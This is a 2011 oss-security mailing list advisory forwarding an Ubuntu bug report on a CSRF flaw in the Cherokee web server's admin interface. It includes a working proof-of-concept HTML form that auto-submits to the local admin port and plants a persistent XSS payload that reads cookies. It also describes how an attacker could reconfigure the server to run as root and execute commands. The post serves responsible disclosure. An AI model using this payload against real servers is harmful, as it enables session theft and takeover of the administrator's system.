oss-sec mailing list archives
Security issue in cherokee
From: Jamie Strandboge <jamie () canonical com>
Date: Fri, 03 Jun 2011 11:01:15 -0500
A security bug was reported against cherokee in Ubuntu. You are being emailed as the upstream contact. Please keep oss-security[1] CC'd for any updates on this issue. This issue should be considered public, but has not yet been assigned a CVE. Once a CVE is assigned, please mention it in any changelogs. Details from the public bug follow: https://launchpad.net/bugs/784632 From the reporter: ---- The cherokee admin server is vulnerable to csrf. Using csrf it is possible to produce a persistent xss in several pages - including the 'status' page via the 'nickname field' of a vserver. An example of this is the following: <html> <body> <form action="http://127.0.0.1:9090/vserver/apply" method="post" id="xssform"> <input type="text" name="tmp!new_droot" value='/var/www/'></input> <input type="text" name="tmp!new_nick" value='" onselect=alert(1) autofocus> <embed src="javascript:alert(document.cookie)">'></input> </form> <script>document.getElementById("xssform").submit();</script> </body> A Worst case scenario could be something like the following: If a user is logged in and the cherokee admin server is running on localhost:9090 then if they visit a $bad page - the bad page may be able to send requests to the server so as to reconfigure it to: 1. run as root 2. the logging of error(or access) will run a command ... ---- Thanks in advance for your cooperation in coordinating a fix for this issue, Jamie Strandboge [1] oss-security () lists openwall com is a public mailing list for people to collaborate on security vulnerabilities and coordinate security updates. -- Jamie Strandboge | http://www.canonical.com
Attachment:
signature.asc
Description: This is a digitally signed message part
Current thread:
- Security issue in cherokee Jamie Strandboge (Jun 03)
- Re: Security issue in cherokee Alvaro Lopez Ortega (Jun 06)
- Re: Security issue in cherokee Josh Bressers (Jun 06)